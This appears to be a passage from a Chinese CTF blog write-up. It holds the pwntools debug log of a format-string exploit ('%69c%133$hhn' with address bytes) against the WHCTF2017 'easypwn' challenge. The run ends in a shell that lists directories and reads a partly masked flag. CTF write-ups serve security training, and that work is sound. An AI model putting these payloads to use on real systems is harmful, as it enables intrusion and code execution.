    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 36  39 63 25 31  │aaaa│aaaa│bb%6│9c%1│
    000003f0  33 33 24 68  68 6e 41 41  19 c0 e1 a5  e0 55 00 00  │33$h│hnAA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x463 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 36 39  63 25 31 33  │aaaa│aaab│b%69│c%13│
    00000400  33 24 68 68  6e 41 41 19  c0 e1 a5 e0  55 20 20 20  │3$hh│nAA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000450  20 0a 49 6e  70 75 74 20  59 6f 75 72  20 43 6f 64  │ ·In│put │Your│ Cod│
    00000460  65 3a 0a                                            │e:·│
    00000463
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 36  36 63 25 31  │aaaa│aaaa│bb%6│6c%1│
    000003f0  33 33 24 68  68 6e 41 41  1a c0 e1 a5  e0 55 00 00  │33$h│hnAA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x460 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 36 36  63 25 31 33  │aaaa│aaab│b%66│c%13│
    00000400  33 24 68 68  6e 41 41 1a  c0 e1 a5 e0  55 20 20 20  │3$hh│nAA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000440  20 20 20 20  20 20 20 20  20 20 20 20  20 20 0a 49  │    │    │    │  ·I│
    00000450  6e 70 75 74  20 59 6f 75  72 20 43 6f  64 65 3a 0a  │nput│ You│r Co│de:·│
    00000460
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x11 bytes:
    b'Input Your Name:\n'
[DEBUG] Sent 0x8 bytes:
    b'/bin/sh\n'
[*] Switching to interactive mode

[DEBUG] Received 0x21 bytes:
    b'OK!I Know Your Name :/bin/sh\n'
    b'Now!'
OK!I Know Your Name :/bin/sh
Now!$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x64 bytes:
    b'bin\n'
    b'boot\n'
    b'dev\n'
    b'etc\n'
    b'home\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
    b'media\n'
    b'mnt\n'
    b'opt\n'
    b'proc\n'
    b'root\n'
    b'run\n'
    b'sbin\n'
    b'srv\n'
    b'start.sh\n'
    b'sys\n'
    b'tmp\n'
    b'usr\n'
    b'var\n'
bin
boot
dev
etc
home
lib
lib32
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x5 bytes:
    b'cat: '
cat: [DEBUG] Received 0x20 bytes:
    b'flag: No such file or directory\n'
flag: No such file or directory
$ cd home
[DEBUG] Sent 0x8 bytes:
    b'cd home\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x5 bytes:
    b'xctf\n'
xctf
$ cd xctf
[DEBUG] Sent 0x8 bytes:
    b'cd xctf\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x25 bytes:
    b'bin\n'
    b'dev\n'
    b'easypwn\n'
    b'flag\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
bin
dev
easypwn
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2d bytes:
    b'cyberpeace{************************c97f2888818ecf}\n'
cyberpeace{************************c97f2888818ecf}
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值